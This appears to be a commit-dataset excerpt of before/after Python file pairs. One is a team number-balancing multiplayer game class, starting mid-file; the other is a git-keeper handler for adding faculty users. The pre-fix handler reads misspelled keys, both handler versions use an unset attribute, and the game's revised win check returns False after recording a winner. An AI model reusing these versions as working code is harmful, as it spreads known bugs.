player.sendMessage(data)
data['action'] = "update"
data['playerData'] = self.getPlayerUpdate(playerTo)
playerTo.sendMessage(data)
update = True
if update:
if self.checkWinStatement():
for player in self.players:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner
})
return True
return False
"""
def start(self):
self.prepareTeams()
self.preparePlayers()
self.winner = False
self.playable = True
self.started = True
return self
def prepareTeams(self, teamNumber = 2):
random.shuffle(self.players)
for i in range(teamNumber):
self.teams.append(Team())
counter = 0
for player in self.players:
self.teams[counter % teamNumber].addPlayer(player)
counter = counter + 1;
return self
def preparePlayers(self):
for team in self.teams:
values = []
for player in team.players:
player.data['dataGame'] = {"summary": random.randint(5,15), "propositions": {"from": {}, "to": {}}, "left": [], "right": []}
tmp = self.randomizeValues(player.data['dataGame']['summary']) + self.randomizeValues(player.data['dataGame']['summary'])
player.data['dataGame']['count'] = len(tmp)
values = values + tmp
random.shuffle(values)
for player in team.players:
player.data['dataGame']['available'] = values[0:player.data['dataGame']['count']]
values = values[player.data['dataGame']['count']:]
for player in team.players:
print([player.nick, player.data, player.team.id])
return self
def moveValueToWeight(self, player, value, weight):
try:
index = player.data['dataGame']['available'].index(value)
val = player.data['dataGame']['available'][index]
weight.append(val)
del player.data['dataGame']['available'][index]
return True
except ValueError:
return False
def moveValueFromWeight(self, player, value, weight):
try:
index = weight.index(value)
val = weight[index]
player.data['dataGame']['available'].append(val)
del weight[index]
return self
except ValueError:
return self
def moveValueBetweenWeights(self, player, From, To, weight):
try:
indexFrom = From.index(weight)
val = From[indexFrom]
To.append(val)
del From[indexFrom]
return True
except ValueError:
return False
def setProposition(self, playerFrom, playerTo, value):
#print(self.checkWinStatement())
try:
tmp = playerFrom.data['dataGame']['propositions']['to'][playerTo] or playerTo.data['dataGame']['propositions']['from'][playerFrom]
return False
except KeyError:
try:
index = playerFrom.data['dataGame']['available'].index(value)
playerFrom.data['dataGame']['propositions']['to'][playerTo] = playerFrom.data['dataGame']['available'][index]
playerTo.data['dataGame']['propositions']['from'][playerFrom] = playerFrom.data['dataGame']['available'][index]
del playerFrom.data['dataGame']['available'][index];
try:
valueToPlayerFrom = playerTo.data['dataGame']['propositions']['to'][playerFrom]
valueToPlayerTo = playerFrom.data['dataGame']['propositions']['to'][playerTo]
playerTo.data['dataGame']['available'].append(valueToPlayerTo)
playerFrom.data['dataGame']['available'].append(valueToPlayerFrom)
del playerTo.data['dataGame']['propositions']['to'][playerFrom]
del playerTo.data['dataGame']['propositions']['from'][playerFrom]
del playerFrom.data['dataGame']['propositions']['to'][playerTo]
del playerFrom.data['dataGame']['propositions']['from'][playerTo]
return True
except KeyError:
pass
return True
except ValueError:
return False
def removeProposition(self, playerFrom, playerTo):
try:
valueFrom = playerFrom.data['dataGame']['propositions']['to'][playerTo]
playerFrom.data['dataGame']['available'].append(valueFrom)
del playerFrom.data['dataGame']['propositions']['to'][playerTo]
del playerTo.data['dataGame']['propositions']['from'][playerFrom]
return True
except KeyError:
return False
def randomizeValues(self,summary):
ret = []
remain = summary
while remain > 0:
number = round(random.normalvariate(floor(summary/3), summary/3))
if number > 0:
if number >= remain:
number = remain
remain = remain - number
ret.append(number)
if len(ret) > summary/2:
return self.randomizeValues(summary)
return ret
def checkWinStatement(self):
if self.winner:
return True
if not self.playable:
return False
for team in self.teams:
win = True
for player in team.players:
if sum(player.data['dataGame']['left']) == player.data['dataGame']['summary'] and sum(player.data['dataGame']['right']) == player.data['dataGame']['summary']:
pass
else:
win = False
if win:
self.playable = False
self.winner = team.name
return True
return False
def getPlayerById(self, player_id):
ret = []
for player in self.players:
if player.id == int(player_id):
ret.append(player)
if len(ret) == 1:
return ret[0]
return False
def getPlayerUpdate(self, player):
team = player.team
return {
"players": [{"name": player.nick, "id": player.id} for player in self.players if player.team == team],
"available": player.data['dataGame']['available'],
"left": player.data['dataGame']['left'],
"right": player.data['dataGame']['right'],
"from": [{"id": p.id, "value": player.data['dataGame']['propositions']['from'][p]} for p in player.data['dataGame']['propositions']['from'].keys()],
"to": [{"id": p.id, "value": player.data['dataGame']['propositions']['to'][p]} for p in player.data['dataGame']['propositions']['to'].keys()]
};
def destroy(self):
pass
"""
players = [ {"name" : "player"}, {"name" : "player2"} ]
demo = Demo(players);
demo.start()
demo.destroy()
print(Game.getGamesArray())
"""
refresh
#!/usr/bin/python3
from Games.Game import Game
import time
import random
from math import ceil, floor;
from Team import Team
import os.path
if __name__ == "__main__":
raise Exception("You cannot run this file directly")
class game(Game):
def __init__(self, players):
self.filename = os.path.dirname(os.path.realpath(__file__));
self.load()
self.players = players
self.teams = []
self.playable = False
self.started = False
self.winner = False
def addPlayer(self, player):
self.players.append(player)
return self
def doAction(self, data):
print(self.players)
try:
action = data['action']
except KeyError:
return False
try:
player = self.getPlayerById(data['id'])
print(player)
except KeyError:
return False
if not player:
return False
update = False
if action == 'move':
args = {}
try:
args['from'] = data['from']
except KeyError:
return False
try:
args['to'] = data['to']
except KeyError:
return False
try:
args['weight'] = data['weight']
except KeyError:
return False
if args['from'] == 'available':
if args['to'] == 'left' or args['to'] == 'right':
if self.moveValueToWeight(player, args['weight'], player.data['dataGame'][args['to']]):
data['action'] = 'move_accepted';
player.sendMessage(data)
return True
elif args['from'] == 'left' or args['from'] == 'right':
if args['to'] == 'available':
if self.moveValueFromWeight(player, args['weight'], player.data['dataGame'][args['from']]):
data['action'] = 'move_accepted';
player.sendMessage(data)
update = True
else:
if self.moveValueBetweenWeights(player, player.data['dataGame'][args['from']], player.data['dataGame'][args['to']], args['weight']):
data['action'] = 'move_accepted';
player.sendMessage(data)
update = True
elif action == 'proposition':
args = {}
try:
args['from'] = data['from']
except KeyError:
return False
try:
args['to'] = self.getPlayerById(data['to'])
except KeyError:
return False
try:
args['weight'] = data['weight']
except KeyError:
return False
if args['from'] == 'left' or args['from'] == 'right':
if not self.moveValueFromWeight(player, args['weight'], player.data['dataGame'][args['from']]):
return False
if self.setProposition(player, args['to'], args['weight']):
data['action'] = 'proposition_accepted'
player.sendMessage(data)
update = True
elif action == "start":
if not self.playable:
self.start()
for player in self.players:
player.sendMessage({
"action": "updateStatus",
"gameStatus": "playable",
"playerData": self.getPlayerUpdate(player)
})
update = True
if update:
if self.checkWinStatement():
for player in self.players:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner
})
return True
"""
try:
value = data['value']
except KeyError:
value = False
default = {
"action": "none"
}
if not self.playable:
if not self.started:
pass
else:
if player:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner,
})
update = True
elif data['action'] == "moveValueToWeight":
try:
weight = data['weight']
if int(weight) == 0:
weight = self.player.data['dataGame']['left']
else:
weight = self.player.data['dataGame']['right']
except KeyError:
weight = False
if weight and player and value:
data['success'] = self.moveValueToWeight(player, value, weight)
else:
data['success'] = False
data['playerData'] = self.getPlayerUpdate(player)
if player:
player.sendMessage(data)
update = True
elif data['action'] == "moveValueFromWeight":
try:
weight = data['weight']
if int(weight) == 0:
weight = self.player.data['dataGame']['propositions']['left']
else:
weight = self.player.data['dataGame']['propositions']['left']
except KeyError:
weight = False
if weight and player and value:
data['success'] = self.moveValueFromWeight(player, value, weight)
else:
data['success'] = False
data['playerData'] = self.getPlayerUpdate(player)
if player:
player.sendMessage(data)
update = True
elif data['action'] == "setProposition":
try:
playerTo = self.getPlayerById(data['to'])
except KeyError:
playerTo = False
if playerTo and player and value:
data['success'] = self.setProposition(player, playerTo, value)
else:
data['success'] = False
if player and playerTo:
data['playerData'] = self.getPlayerUpdate(player)
player.sendMessage(data)
data['action'] = "update"
data['playerData'] = self.getPlayerUpdate(playerTo)
playerTo.sendMessage(data)
update = True
elif data['action'] == "removeProposition":
try:
playerTo = self.getPlayerById(data['to'])
except KeyError:
playerTo = False
if playerTo and player:
data['success'] = self.removeProposition(player, playerTo)
else:
data['success'] = False
if player and playerTo:
data['playerData'] = self.getPlayerUpdate(player)
player.sendMessage(data)
data['action'] = "update"
data['playerData'] = self.getPlayerUpdate(playerTo)
playerTo.sendMessage(data)
update = True
if update:
if self.checkWinStatement():
for player in self.players:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner
})
return True
return False
"""
def start(self):
self.prepareTeams()
self.preparePlayers()
self.winner = False
self.playable = True
self.started = True
return self
def prepareTeams(self, teamNumber = 2):
random.shuffle(self.players)
for i in range(teamNumber):
self.teams.append(Team())
counter = 0
for player in self.players:
self.teams[counter % teamNumber].addPlayer(player)
counter = counter + 1;
return self
def preparePlayers(self):
for team in self.teams:
values = []
for player in team.players:
player.data['dataGame'] = {"summary": random.randint(5,15), "propositions": {"from": {}, "to": {}}, "left": [], "right": []}
tmp = self.randomizeValues(player.data['dataGame']['summary']) + self.randomizeValues(player.data['dataGame']['summary'])
player.data['dataGame']['count'] = len(tmp)
values = values + tmp
random.shuffle(values)
for player in team.players:
player.data['dataGame']['available'] = values[0:player.data['dataGame']['count']]
values = values[player.data['dataGame']['count']:]
for player in team.players:
print([player.nick, player.data, player.team.id])
return self
def moveValueToWeight(self, player, value, weight):
try:
index = player.data['dataGame']['available'].index(value)
val = player.data['dataGame']['available'][index]
weight.append(val)
del player.data['dataGame']['available'][index]
return True
except ValueError:
return False
def moveValueFromWeight(self, player, value, weight):
try:
index = weight.index(value)
val = weight[index]
player.data['dataGame']['available'].append(val)
del weight[index]
return self
except ValueError:
return self
def moveValueBetweenWeights(self, player, From, To, weight):
try:
indexFrom = From.index(weight)
val = From[indexFrom]
To.append(val)
del From[indexFrom]
return True
except ValueError:
return False
def setProposition(self, playerFrom, playerTo, value):
#print(self.checkWinStatement())
try:
tmp = playerFrom.data['dataGame']['propositions']['to'][playerTo] or playerTo.data['dataGame']['propositions']['from'][playerFrom]
return False
except KeyError:
try:
index = playerFrom.data['dataGame']['available'].index(value)
playerFrom.data['dataGame']['propositions']['to'][playerTo] = playerFrom.data['dataGame']['available'][index]
playerTo.data['dataGame']['propositions']['from'][playerFrom] = playerFrom.data['dataGame']['available'][index]
del playerFrom.data['dataGame']['available'][index];
try:
valueToPlayerFrom = playerTo.data['dataGame']['propositions']['to'][playerFrom]
valueToPlayerTo = playerFrom.data['dataGame']['propositions']['to'][playerTo]
playerTo.data['dataGame']['available'].append(valueToPlayerTo)
playerFrom.data['dataGame']['available'].append(valueToPlayerFrom)
del playerTo.data['dataGame']['propositions']['to'][playerFrom]
del playerTo.data['dataGame']['propositions']['from'][playerFrom]
del playerFrom.data['dataGame']['propositions']['to'][playerTo]
del playerFrom.data['dataGame']['propositions']['from'][playerTo]
return True
except KeyError:
pass
return True
except ValueError:
return False
def removeProposition(self, playerFrom, playerTo):
try:
valueFrom = playerFrom.data['dataGame']['propositions']['to'][playerTo]
playerFrom.data['dataGame']['available'].append(valueFrom)
del playerFrom.data['dataGame']['propositions']['to'][playerTo]
del playerTo.data['dataGame']['propositions']['from'][playerFrom]
return True
except KeyError:
return False
def randomizeValues(self,summary):
ret = []
remain = summary
while remain > 0:
number = round(random.normalvariate(floor(summary/3), summary/3))
if number > 0:
if number >= remain:
number = remain
remain = remain - number
ret.append(number)
if len(ret) > summary/2:
return self.randomizeValues(summary)
return ret
def checkWinStatement(self):
if self.winner:
return True
if not self.playable:
return False
for team in self.teams:
win = True
for player in team.players:
if sum(player.data['dataGame']['left']) == player.data['dataGame']['summary'] and sum(player.data['dataGame']['right']) == player.data['dataGame']['summary']:
pass
else:
win = False
if win:
self.playable = False
self.winner = team.name
return False
return True
return False
def getPlayerById(self, player_id):
ret = []
for player in self.players:
if player.id == int(player_id):
ret.append(player)
if len(ret) == 1:
return ret[0]
return False
def getPlayerUpdate(self, player):
team = player.team
return {
"players": [{"name": player.nick, "id": player.id} for player in self.players if player.team == team],
"available": player.data['dataGame']['available'],
"left": player.data['dataGame']['left'],
"right": player.data['dataGame']['right'],
"from": [{"id": p.id, "value": player.data['dataGame']['propositions']['from'][p]} for p in player.data['dataGame']['propositions']['from'].keys()],
"to": [{"id": p.id, "value": player.data['dataGame']['propositions']['to'][p]} for p in player.data['dataGame']['propositions']['to'].keys()]
};
def destroy(self):
pass
"""
players = [ {"name" : "player"}, {"name" : "player2"} ]
demo = Demo(players);
demo.start()
demo.destroy()
print(Game.getGamesArray())
"""
|
# Copyright 2016, 2017, 2018 Nathan Sommer and Ben Coleman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Provides a handler for adding faculty users."""
import json
from gkeepcore.path_utils import user_from_log_path
from gkeepserver.event_handler import EventHandler, HandlerException
from gkeepserver.faculty import FacultyMembers
from gkeepserver.gkeepd_logger import gkeepd_logger
from gkeepserver.handler_utils import log_gkeepd_to_faculty
from gkeepserver.info_update_thread import info_updater
class FacultyAddHandler(EventHandler):
"""Handle adding new faculty members."""
def handle(self):
"""
Handle adding a new faculty member.
Writes success or failure to the gkeepd to faculty log.
"""
try:
faculty_members = FacultyMembers()
if faculty_members.faculty_exists(self._username):
error = 'Faculty user {} already exists'.format(self._username)
raise HandlerException(error)
faculty_members.add_faculty(self._last_name, self._first_name,
self._email_address, self._admin)
info_updater.enqueue_full_scan(self._username)
self._log_to_faculty('FACULTY_ADD_SUCCESS', self._username)
except Exception as e:
self._log_error_to_faculty(str(e))
gkeepd_logger.log_warning('Faculty add failed: {0}'.format(e))
def __repr__(self) -> str:
"""
Build a string representation of the event.
:return: string representation of the event
"""
string = 'Add faculty event: {0}'.format(self._payload)
return string
def _parse_payload(self):
"""
Extracts the faculty info from the payload
Raises HandlerException if the log line is not well formed.
Sets the following attributes:
_adder_username - username of the user adding the faculty member
_last_name - last name of the new faculty member
_first_name - first name of the new faculty member
_username = username of the new faculty member
_email_address - email address of the new faculty member
_admin - whether or not the new user should be an admin
"""
self._adder_username = user_from_log_path(self._log_path)
try:
faculty_dictionary = json.loads(self._payload)
except json.JSONDecodeError:
raise HandlerException('Payload is not valid JSON')
for required_field in ('last_name', 'first_name', 'email_address',
'admin'):
if required_field not in faculty_dictionary:
raise HandlerException('Missing required field {}'
.format(required_field))
self._last_name = faculty_dictionary['last_name']
self._first_name = faculty_dictionary['first_name']
self._email_address = faculty_dictionary['email_adress']
self._admin = faculty_dictionary['admin']
try:
self._username, _ = faculty_dictionary['email_add']
except ValueError:
raise HandlerException('{} is not an email address'
.format(self._email_address))
def _log_to_faculty(self, event_type, text):
"""
Write to the gkeepd.log for the faculty member.
:param event_type: event type
:param text: text to write to the log
"""
log_gkeepd_to_faculty(self._faculty_username, event_type, text)
def _log_error_to_faculty(self, error):
"""
Log a FACULTY_ADD_ERROR message to the gkeepd.log for the faculty.
:param error: the error message
"""
self._log_to_faculty('FACULTY_ADD_ERROR', error)
Fix email address errors
# Copyright 2016, 2017, 2018 Nathan Sommer and Ben Coleman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Provides a handler for adding faculty users."""
import json
from gkeepcore.path_utils import user_from_log_path
from gkeepserver.event_handler import EventHandler, HandlerException
from gkeepserver.faculty import FacultyMembers
from gkeepserver.gkeepd_logger import gkeepd_logger
from gkeepserver.handler_utils import log_gkeepd_to_faculty
from gkeepserver.info_update_thread import info_updater
class FacultyAddHandler(EventHandler):
"""Handle adding new faculty members."""
def handle(self):
"""
Handle adding a new faculty member.
Writes success or failure to the gkeepd to faculty log.
"""
try:
faculty_members = FacultyMembers()
if faculty_members.faculty_exists(self._username):
error = 'Faculty user {} already exists'.format(self._username)
raise HandlerException(error)
faculty_members.add_faculty(self._last_name, self._first_name,
self._email_address, self._admin)
info_updater.enqueue_full_scan(self._username)
self._log_to_faculty('FACULTY_ADD_SUCCESS', self._username)
except Exception as e:
self._log_error_to_faculty(str(e))
gkeepd_logger.log_warning('Faculty add failed: {0}'.format(e))
def __repr__(self) -> str:
"""
Build a string representation of the event.
:return: string representation of the event
"""
string = 'Add faculty event: {0}'.format(self._payload)
return string
def _parse_payload(self):
"""
Extracts the faculty info from the payload
Raises HandlerException if the log line is not well formed.
Sets the following attributes:
_adder_username - username of the user adding the faculty member
_last_name - last name of the new faculty member
_first_name - first name of the new faculty member
_username = username of the new faculty member
_email_address - email address of the new faculty member
_admin - whether or not the new user should be an admin
"""
self._adder_username = user_from_log_path(self._log_path)
try:
faculty_dictionary = json.loads(self._payload)
except json.JSONDecodeError:
raise HandlerException('Payload is not valid JSON')
for required_field in ('last_name', 'first_name', 'email_address',
'admin'):
if required_field not in faculty_dictionary:
raise HandlerException('Missing required field {}'
.format(required_field))
self._last_name = faculty_dictionary['last_name']
self._first_name = faculty_dictionary['first_name']
self._email_address = faculty_dictionary['email_address']
self._admin = faculty_dictionary['admin']
try:
self._username, _ = self._email_address.split('@')
except ValueError:
raise HandlerException('{} is not an email address'
.format(self._email_address))
def _log_to_faculty(self, event_type, text):
"""
Write to the gkeepd.log for the faculty member.
:param event_type: event type
:param text: text to write to the log
"""
log_gkeepd_to_faculty(self._faculty_username, event_type, text)
def _log_error_to_faculty(self, error):
"""
Log a FACULTY_ADD_ERROR message to the gkeepd.log for the faculty.
:param error: the error message
"""
self._log_to_faculty('FACULTY_ADD_ERROR', error)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.